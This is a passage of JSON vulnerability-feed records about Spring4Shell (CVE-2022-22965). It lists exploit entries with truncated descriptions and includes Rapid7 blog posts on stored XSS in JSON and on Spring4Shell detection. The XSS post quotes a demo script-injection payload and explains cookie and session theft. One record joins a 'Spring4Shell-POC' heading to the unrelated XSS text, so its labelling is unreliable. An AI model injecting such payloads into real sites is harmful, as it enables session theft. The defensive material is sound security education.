"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-28T11:37:34", "id": "9538B7BA-979F-523C-9913-4FE62CF77C5C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:00:36", "description": "# Spring4Shell(CVE-2022-22965)\n\nSpring Framework RCE via Data Bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T13:35:01", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-28T11:37:35", "id": "3DB87825-2C58-5ABC-8BA3-E1CB80AFB11E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:03:44", "description": "# Minimal CVE-2022-22965 example\n\nAt the time of writing, spring...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T19:47:47", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-10-15T13:39:43", "id": "FF4B608A-EAF3-5EFC-921B-248F48F14720", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:02:42", "description": "# Spring4Shell-POC (CVE-2022-22965)\n\n Proof of Concept\n\n\n\nI recently wrote a blog post on [injection-type vulnerabilities](<http://rapid7.com/blog/post/2021/10/19/owasp-top-10-deep-dive-injection-and-stack-traces-from-a-hackers-perspective/>) and how they were knocked down a few spots from 1 to 3 on the new [OWASP Top 10 for 2022](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>). The main focus of that article was to demonstrate how stack traces could be \u2014 and still are \u2014 used via injection attacks to gather information about an application to further an attacker's goal. In that post, I skimmed over one of my all time favorite types of injections: [cross-site scripting (XSS)](<https://www.rapid7.com/fundamentals/cross-site-scripting/>).\n\nIn this post, I\u2019ll cover this gem of an exploit in much more depth, highlighting how it has managed to adapt to the newer environments of today\u2019s modern web applications, specifically the API and Javascript Object Notation (JSON).\n\nI know the term API is thrown around a lot when referencing web applications these days, but for this post, I will specifically be referencing requests made from the front end of a web application to the back end via ajax (Asynchronous JavaScript and XML) or more modern approaches like the fetch method in JavaScript.\n\nBefore we begin, I'd like to give a quick recap of what XSS is and how a legacy application might handle these types of requests that could trigger XSS, then dive into how XSS still thrives today in modern web applications via the methods mentioned so far.\n\n## What is cross-site scripting?\n\nThere are many types of XSS, but for this post, I\u2019ll only be focusing on persistent XSS, which is sometimes referred to as stored XSS.\n\nXSS is a type of injection attack, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to execute malicious code \u2014 generally in the form of a browser-side script like JavaScript, for example \u2014 against an unsuspecting end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application accepts an input from a user without sanitizing, validating, escaping, or encoding it.\n\nBecause the end user\u2019s browser has no way to know not to trust the malicious script, the browser will execute the script. Because of this broken trust, attackers typically leverage these vulnerabilities to steal victims\u2019 cookies, session tokens, or other sensitive information retained by the browser. They could also redirect to other malicious sites, install keyloggers or crypto miners, or even change the content of the website.\n\nNow for the \"stored\" part. As the name implies, stored XSS generally occurs when the malicious payload has been stored on the target server, usually in a database, from input that has been submitted in a message forum, visitor log, comment field, form, or any parameter that lacks proper input sanitization.\n\nWhat makes this type of XSS so much more damaging is that, unlike reflected XSS \u2013 which only affects specific targets via cleverly crafted links \u2013 stored XSS affects any and everyone visiting the compromised site. This is because the XSS has been stored in the applications database, allowing for a much larger attack surface.\n\n## Old-school apps\n\nNow that we\u2019ve established a basic understanding of stored XSS, let's go back in time a few decades to when web apps were much simpler in their communications between the front-end and back-end counterparts.\n\nLet's say you want to change some personal information on a website, like your email address on a contacts page. When you enter in your email address and click the update button, it triggers the POST method to send the form data to the back end to update that value in a database. The database updates the value in a table, then pushes a response back to the web applications front end, or UI, for you to see. This would usually result in the entire page having to reload to display only a very minimal amount of change in content, and while it\u2019s very inefficient, nonetheless the information would be added and updated for the end user to consume.\n\nIn the example below, clicking the update button submits a POST form request to the back-end database where the application updates and stores all the values, then provides a response back to the webpage with the updated info.\n\n\n\n\n\n## Old-school XSS\n\nAs mentioned in my previous blog post on injection, I give an example where an attacker enters in a payload of <script>alert(\u201cThis is XSS\u201d)</script> instead of their email address and clicks the update button. Again, this triggers the POST method to take our payload and send it to the back-end database to update the email table, then pushes a response back to the front end, which gets rendered back to the UI in HTML. However, this time the email value being stored and displayed is my XSS payload, <script>alert(\u201cThis is XSS\u201d)</script>, not an actual email address.\n\n\n\nAs seen above, clicking the \u201cupdate\u201d button submits the POST form data to the back end where the database stores the values, then pushes back a response to update the UI as HTML.\n\n\n\nHowever, because our payload is not being sanitized properly, our malicious JavaScript gets executed by the browser, which causes our alert box to pop up as seen below.\n\n\n\nWhile the payload used in the above example is harmless, the point to drive home here is that we were able to get the web application to store and execute our JavaScript all through a simple contact form. Anyone visiting my contact page will see this alert pop up because my XSS payload has been stored in the database and gets executed every time the page loads. From this point on, the possible damage that could be done here is endless and only limited by the attacker\u2019s imagination\u2026 well, and their coding skills. \n\n## New-school apps\n\nIn the first example I gave, when you updated the email address on the contact page and the request was fulfilled by the backend, the entire page would reload in order to display the newly created or updated information. You can see how inefficient this is, especially if the only thing changing on the page is a single line or a few lines of text. Here is where ajax and/or the fetch method comes in.\n\n[Ajax, or the fetch method](<https://www.w3schools.com/whatis/whatis_ajax.asp>), can be used to get data from or post data to a remote source, then update the front-end UI of that web application without having to refresh the page. Only the content from the specific request is updated, not the entire page, and that is the key difference between our first example and this one.\n\nAnd a very popular format for said data being sent and received is JavaScript Object Notation, most commonly known as JSON. (Don't worry, I\u2019ll get back to those curly braces in just a bit.) \n\n## New-school XSS\n\n_(Well, not really, but it sounds cool.)_\n\nNow, let's pretend we\u2019ve traveled back to the future and our contact page has been rewritten to use ajax or the fetch method to send and receive data to and from the database. From the user's point of view, nothing has changed \u2014 still the same ol\u2019 form. But this time, when the email address is being updated, only the contact form refreshes. The entire page and all of its contents do not refresh like in the previous version, which is a major win for efficiency and user experience. \n\nBelow is an example of what a POST might look like formatted in JSON.\n\n\n\n\u201cWhat is JSON?\u201d you might ask. Short for JavaScript Object Notation, it is a lightweight text format for storing and transferring data and is most commonly used when sending data to and from servers. Remember those curly braces I mentioned earlier? Well, one quick and easy way to spot JSON is the formatting and the use of curly braces.\n\nIn the example above, you can see what our new POST looks like using ajax or the fetch method in JavaScript. While the end result is no different than before, as seen in the example below, the method that was used to update the page is quite different. The key difference here is that the data we\u2019re wanting to update is being treated as just that: data, but in the form of JSON as opposed to HTML.\n\n\n\nNow, let's inject the same XSS payload into the same email field and hit update. In the example below, you can see that our POST request has been wrapped in curly braces, using JSON, and is formatted a bit differently than previously before being sent to the back end to be processed.\n\n\n\n\n\nIn the example above, you can see that the application is allowing my email address to be the XSS payload in its entirety. However, the JavaScript here is only being displayed and not being executed as code by the browser, so the alert \u201cpop\u201d message never gets triggered as in the previous example. That again is the key difference from the original way we were fulfilling the requests versus our new, more modern way \u2014 or in short, using JSON instead of HTML.\n\nNow you might be asking yourself, what's wrong with allowing the XSS payload to be the email address if it's only being displayed and not being executed as JavaScript by the browser. That is a valid question, but hear me out.\n\nSee, I've been working in this industry long enough to know that the two most common responses to a question or statement regarding cybersecurity begin with either \u201cthat depends\u2026\u201d or \u201cwhat if\u2026\u201d I'm going to go with the latter here and throw a couple what-ifs at you.\n\nNow that my XSS is stored in your database, it\u2019s only a matter of time before this ticking time bomb goes off. Just because my XSS is being treated as JSON and not HTML now does not mean that will always be the case, and attackers are betting on this.\n\nHere are a few scenarios.\n\n### Scenario 1\n\nWhat if team B handles this data differently from team A? What if team B still uses more traditional methods of sending and receiving data to and from the back end and does leverage the use of HTML and not JSON? \n\nIn that case, the XSS would most likely eventually get executed. It might not affect the website that the XSS was originally injected into, but the stored data can be (and usually is) also used elsewhere. The XSS stored in that database is probably going to be shared and used by multiple other teams and applications at some point. The odds of all those different teams leveraging the exact same standards and best practices are slim to none, and attackers know this. \n\n### Scenario 2\n\nWhat if, down the road, a developer using more modern techniques like ajax or the fetch method to send and receive data to and from the back end decides to use the .innerHTML property instead of .innerTEXT to load that JSON into the UI? All bets are off, and the stored XSS that was previously being protected by those lovely curly braces will now most likely get executed by the browser.\n\n### Scenario 3\n\nLastly, what if the current app had been developed to use server-side rendering, but a decision from higher up has been made that some costs need to be cut and that the company could actually save money by recoding some of their web apps to be client-side rather than server-side? \n\nPreviously, the back end was doing all the work, including sanitizing all user input, but now the shift will be for the browser to do all the heavy lifting. Good luck spotting all the XSS stored in the DB \u2014 in its previous state, it was \u201charmless,\u201d but now it could get rendered to the UI as HTML, allowing the browser to execute said stored XSS. In this scenario, a decision that was made upstream will have an unexpected security impact downstream, both figuratively and literally \u2014 a situation that is all too well-known these days.\n\n## Final thoughts\n\nPart of my job as a security advisor is to, well, advise. And it's these types of situations that keep me up at night. I come across XSS in applications every day, and while I may not see as many fun and exciting \u201cpops\u201d as in years past, I see something a bit more troubling. \n\nThis type of XSS is what I like to call a \u201csleeper vuln\u201d \u2013 laying dormant, waiting for the right opportunity to be woken up. If I didn't know any better, I'd say XSS has evolved and is aware of its new surroundings. Of course, XSS hasn\u2019t evolved, but the applications in which it lives have. \n\nAt the end of the day, we\u2019re still talking about the same XSS from its conception, the same XSS that has been on the [OWASP Top 10](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) for decades \u2014 what we\u2019re really concerned about is the lack of sanitization or handling of user input. But now, with the massive adoption of JavaScript frameworks like Angular, libraries like React, the use of APIs, and the heavy reliance on them to handle the data properly, we\u2019ve become complacent in our duties to harden applications the proper way.\n\nThere seems to be a division in camps around XSS in JSON. On the one hand, some feel that since the JavaScript isn't being executed by the browser, everything is fine. Who cares if an email address (or any data for that matter) is potentially dangerous \u2014 _**as long as**_ it's not being executed by the browser. And on the other hand, you have the more fundamentalist, dare I say philosophical thought that all user input should never be trusted: It should always be sanitized, regardless of whether it\u2019s treated as data or not \u2014 and not solely because of following best coding and security practices, but also because of the \u201cthat depends\u201d and \u201cwhat if\u201d scenarios in the world. \n\nI'd like to point out in my previous statement above, that \u201c_**as long as**_\u201d is vastly different from _**\u201c**cannot._\u201d \u201cAs long as\u201d implies situational awareness and that a certain set of criteria need to be met for it to be true or false, while \u201ccannot\u201d is definite and fixed, regardless of the situation or criteria. \u201cAs long as the XSS is wrapped in curly braces\u201d means it does not pose a risk in its current state but could in other states. But if input is sanitized and escaped properly, the XSS would never exist in the first place, and thus it \u201ccannot\u201d or could not be executed by the browser, ever.\n\nI guess I cannot really complain too much about these differences of opinions though. The fact that I'm even having these conversations with others is already a step in the right direction. But what does concern me is that it's 2022, and we\u2019re still seeing XSS rampant in applications, but because it's wrapped in JSON somehow makes it acceptable. One of the core fundamentals of my job is to find and prioritize risk, then report. And while there is always room for discussion around the severity of these types of situations, lots of factors have to be taken into consideration, a spade isn't always a spade in [application security](<https://www.rapid7.com/fundamentals/web-application-security/>), or cybersecurity in general for that matter. But you can rest assured if I find XSS in JSON in your environment, I will be calling it out. \n\nI hope there will be a future where I can look back and say, \u201cRemember that one time when curly braces were all that prevented your website from getting hacked?\u201d Until then, JSON or not, never trust user data, and sanitize all user input (and output for that matter). A mere { } should never be the difference between your site getting hacked or not.\n\n_**Additional reading:**_\n\n * _[Cloud-Native Application Protection (CNAPP): What's Behind the Hype?](<https://www.rapid7.com/blog/post/2022/05/02/cloud-native-application-protection-cnapp-whats-behind-the-hype/>)_\n * _[Rapid7 Named a Visionary in 2022 Magic Quadrant\u2122 for Application Security Testing Second Year in a Row](<https://www.rapid7.com/blog/post/2022/04/21/rapid7-named-a-visionary-in-2022-magic-quadrant-for-application-security-testing-second-year-in-a-row/>)_\n * _[Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1](<https://www.rapid7.com/blog/post/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/>)_\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T15:48:03", "type": "rapid7blog", "title": "XSS in JSON: Old-School Attacks for Modern Applications", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-04T15:48:03", "id": "RAPID7BLOG:07EA4EC150B77E4EB3557E1B1BA39725", "href": "https://blog.rapid7.com/2022/05/04/xss-in-json-old-school-attacks-for-modern-applications/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:04:09", "description": "\n\nSummer is in full swing, and that means soaring temperatures, backyard grill-outs, and the latest roundup of Q2 application security improvements from Rapid7. Yes, we know you\u2019ve been waiting for this moment with more anticipation than Season 4 of Stranger Things. So let\u2019s start running up that hill, not beat around the bush (see what we did there?), and dive right in.\n\n## OWASP Top 10 for application security\n\nWay, way back in September of 2021 (it feels like it was yesterday), the Open Web Application Security Project (OWASP) released its [top 10 list of critical web application security risks](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>). Naturally, we were all over it, as OWASP is one of the most trusted voices in cybersecurity, and their Top 10 lists are excellent places to start understanding where and how threat actors could be coming for your applications. We released [a ton of material](<https://www.rapid7.com/blog/tag/owasp-top-10-2021/>) to help our customers better understand and implement the recommendations from OWASP.\n\nThis quarter, we were able to take those protections another big step forward by providing an [OWASP 2021 Attack Template and Report for InsightAppSec](<https://www.rapid7.com/blog/post/2022/05/18/find-fix-and-report-owasp-top-10-vulnerabilities-in-insightappsec/>). With this new feature, your security team can work closely with development teams to discover and remediate vulnerabilities in ways that jive with security best practice. It also helps to focus your AppSec program around the updated categories provided by OWASP (which we highly suggest you do).\n\nThe new attack template includes all the relevant attacks included in the updated OWASP Top 10 list which means you can focus on the most important vulnerabilities to remediate, rather than be overwhelmed by too many vulnerabilities and not focusing on the right ones. Once the vulns are discovered, [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>) helps your development team to remediate the issues in several different ways, including a new OWASP Top 10 report and the ability to let developers confirm vulnerabilities and fixes with Attack Replay.\n\n## Scan engine and attack enhancements\n\nProduct support for OWASP 2021 wasn\u2019t the only improvement we made to our[ industry-leading DAST](<https://www.rapid7.com/blog/post/2022/04/21/rapid7-named-a-visionary-in-2022-magic-quadrant-for-application-security-testing-second-year-in-a-row/>) this quarter. In fact, we\u2019ve been quite busy adding additional attack coverage and making scan engine improvements to increase coverage and accuracy for our customers. Here are just a few. \n\n### Spring4Shell attacks and protections with InsightAppSec and tCell\n\nWe instituted a pair of improvements to InsightAppSec and [tCell](<https://www.rapid7.com/products/tcell/>) meant to identify and block the now-infamous [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) vulnerability. We now have included a default RCE attack module specifically to test for the Spring4Shell vulnerability with InsightAppSec. That feature is available to all InsightAppSec customers right now, and we highly recommend using it to prevent this major vulnerability from impacting your applications. \n\nAdditionally, for those customers leveraging tCell to protect their apps, we've added new detections and the ability to block Spring4Shell attacks against your web applications. In addition, we've added Spring4Shell coverage for our Runtime SCA capability. Check out [more here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on both of these new enhancements. \n\n### New out-of-band attack module\n\nWe\u2019ve added a new out-of-band SQL injection module similar to Log4Shell, except it leverages the DNS protocol, which is typically less restricted and used by the adversary. It's included in the \"All Attacks\" attack template and can be added to any customer attack template.\n\n### Improved scanning for session detection\n\nWe have made improvements to our scan engine on InsightAppSec to better detect unwanted logouts. When configuring authentication, the step-by-step instructions will guide you through configuring this process for your web applications.\n\n## Making it easier for our customers\n\nThis wouldn\u2019t be a quarterly feature update if we didn\u2019t mention ways we are making InsightAppSec and tCell even easier and more efficient for our customers. In the last few months, we have moved the \"Manage Columns\" function into \"Vulnerabilities\" in InsightAppSec to make it even more customizable. You can now also hide columns, drag and drop them where you would like, and change the order in ways that meet your needs. \n\nWe\u2019ve also released an AWS AMI of the tCell nginx agent to make it easier for current customers to deploy tCell. This is perfect for those who are familiar with AWS and want to get up and running with tCell fast. Customers who also want a basic understanding of how tCell works and want to share tCell\u2019s value with their dev teams will find this new AWS AMI to provide insight fast. \n\nSummer may be a time to take it easy and enjoy the sunshine, but we\u2019re going to be just as hard at work making improvements to InsightAppSec and tCell over the next three months as we were in the last three. With a break for a hot dog and some fireworks in there somewhere. Stay tuned for more from us and have a great summer.\n\n_**Additional reading:**_\n\n * _[Application Security in 2022: Where Are We Now?](<https://www.rapid7.com/blog/post/2022/06/29/application-security-in-2022-where-are-we-now/>)_\n * _[API Security: Best Practices for a Changing Attack Surface](<https://www.rapid7.com/blog/post/2022/06/27/api-security-best-practices-for-a-changing-attack-surface/>)_\n * _[How to Secure App Development in the Cloud, With Tips From Gartner](<https://www.rapid7.com/blog/post/2022/06/22/how-to-secure-app-development-in-the-cloud-with-tips-from-gartner/>)_\n * _[Find, Fix, and Report \u200bOWASP Top 10 Vulnerabilities in InsightAppSec](<https://www.rapid7.com/blog/post/2022/05/18/find-fix-and-report-owasp-top-10-vulnerabilities-in-insightappsec/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T15:45:00", "type": "rapid7blog", "title": "It\u2019s the Summer of AppSec: Q2 Improvements to Our Industry-Leading DAST and WAAP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-07-13T15:45:00", "id": "RAPID7BLOG:66B9F80A5ED88EFA9D054CBCE8AA19A5", "href": "https://blog.rapid7.com/2022/07/13/its-the-summer-of-appsec-q2-improvements-to-our-industry-leading-dast-and-waap/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\nThe warm weather is starting to roll in, the birds are chirping, and Spring... well, [Spring4Shell](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) is making a timely entrance. If you\u2019re still recovering from [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), we\u2019re here to tell you you're not alone. While discovery and research of [CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) is evolving, [Rapid7 is committed](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>) to providing our customers updates and guidance. In this blog, we wanted to share some recent product enhancements across our [application security](<https://www.rapid7.com/fundamentals/web-application-security/>) portfolio to help our customers with easy ways to test and secure their apps against Spring4Shell.\n\n## What is Spring4Shell?\n\nBefore we jump into how we can help you with our products, let's give a quick overview of Spring4Shell. CVE-2022-22965 affects Spring MVC and Spring WebFlux applications running JDK versions 9 and later. A new feature was introduced in JDK version 9 that allows access to the ClassLoader from a Class. This vulnerability can be exploited for remote code execution (RCE). If you\u2019re looking for more detailed information on Spring4Shell, check out our overview blog [here](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## _Updated: _RCE Attack Module for Spring4Shell\n\nCustomers leveraging [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>), our dynamic application security testing (DAST) tool, can regularly assess the risk of their applications. InsightAppSec allows you to configure 100+ types of web attacks to simulate real-world exploitation attempts. While it may be April 1st, we\u2019re not foolin\u2019 around when it comes to our excitement in sharing [this update](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) to our RCE Attack Module that we\u2019ve included in the default All Modules Attack Template \u2013 specifically testing for Spring4Shell. \n\nCloud customers who already have the [All Modules Attack Template](<https://docs.rapid7.com/insightappsec/attack-templates>) enabled will automatically benefit from this new RCE attack as part of their regular scan cadence. As of April 4th, customers with [on-prem scan engines](<https://docs.rapid7.com/release-notes/appspider/20220404/>) can also benefit from this updated RCE attack module. For those customers with on-premises engines, make sure to have auto-upgrades turned on to automatically benefit from this updated Attack Module, or update manually to the latest scan engine. \n\n\n\n\n## _NEW:_ Block against Spring4Shell attacks\n\nIn addition to assessing your applications for attacks with InsightAppSec, we\u2019ve also got you covered when it comes to protecting your in-production applications. With [tCell](<https://www.rapid7.com/products/tcell/>), customers can both detect and block anomalous activity, such as Spring4Shell exploit attempts. Check out the GIF below on how to enable the recently added Spring RCE block rule in tCell.\n\n\n\n## _NEW:_ Identify vulnerable packages (such as CVE-2022-22965)\n\nA key component of Spring4Shell is detecting whether or not you have any vulnerable packages. tCell customers leveraging the [Java agent](<https://docs.rapid7.com/tcell/installing-the-java-agent-for-tomcat>) can determine if they have any vulnerable packages, including CVE-2022-22965, in their runtime environment.\n\nSimply navigate to tCell on the Insight Platform, select your application, and navigate to the [**Packages and Vulns**](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) tab. Here you can view any vulnerable packages that were detected at runtime, and follow the specified remediation guidance.\n\n\n\nCurrently, the recommended mitigation guidance is for Spring Framework users to update to the fixed versions. Further information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>).\n\n## Utilize OS commands\n\nOne of the benefits of using tCell\u2019s [app server agents](<https://docs.rapid7.com/tcell/install-an-agent>) is the fact that you can enable blocking (after confirming you\u2019re not blocking any legitimate commands) for OS commands. This will prevent a wide range of exploits including Shell commands. Below you will see an example of our [**OS Commands**](<https://docs.rapid7.com/tcell/command-injection>) dashboard highlighting the execution attempts, and in the second graphic, you\u2019ll see the successfully blocked OS command events.\n\n\n\n \n\n\n\n\n## What\u2019s next?\n\nWe recommend following [Spring\u2019s latest guidance](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) on remediation to reduce risk in your applications. If you\u2019re looking for more information at any time, we will continue to update both this blog, and our [initial response blog to Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). Additionally, you can always reach out to your customer success manager, support resources, or anyone on your Rapid7 account team. Happy April \u2013 and here\u2019s to hoping the only shells you deal with in the future are those found on the beach!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T22:26:36", "type": "rapid7blog", "title": "Securing Your Applications Against Spring4Shell (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T22:26:36", "id": "RAPID7BLOG:3CB617802DB281BCA8BA6057AE3A98E0", "href": "https://blog.rapid7.com/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-15T15:31:14", "description": "> _To the left, to the left, to the right, right \u2014 the CI/CD Pipeline is on the move._\n\n\n\nDevSecOps is all about adding security across the application lifecycle. A popular approach to application security is to [shift left](<https://www.rapid7.com/blog/post/2021/09/27/to-the-left-your-guide-to-infrastructure-as-code-for-shifting-left/>), which means moving security earlier in the [software development lifecycle (SDLC)](<https://www.rapid7.com/fundamentals/software-development-life-cycle-sdlc/>). This makes sense: If you find a critical security bug in production, it costs a lot more to resolve it than if you found it in development.\n\nIn Q1 2022, we've continued to invest in improvements to [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>) and [tCell](<https://www.rapid7.com/products/tcell/>) that help organizations shift left and automate security testing prior to production deployment. And at the same time, we've made other enhancements to make your life easier. Oh\u2026 and we added new attacks and blocking rules for [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## Shifting app security testing left in the CI/CD pipeline\n\nYour development teams are innovating and releasing features and new experiences faster than ever before. Manual testing can no longer keep up with the speed of innovation. Taking a [DevSecOps](<https://www.rapid7.com/fundamentals/devsecops/>) approach means baking security across the application lifecycle and includes shifting left whenever possible.\n\n[Dynamic application security testing (DAST)](<https://www.rapid7.com/fundamentals/dast/>) solutions simulate attacks just like the attackers, and they're known for their accuracy and coverage across a wide range of technologies. However, traditional DAST solutions have struggled to work with modern applications and software development methodologies.\n\nSince the launch of InsightAppSec \u2014 Rapid7's industry leading cloud-native DAST \u2014 we've focused on providing coverage of modern applications, as well as being able to integrate as far left as the build process.\n\n> 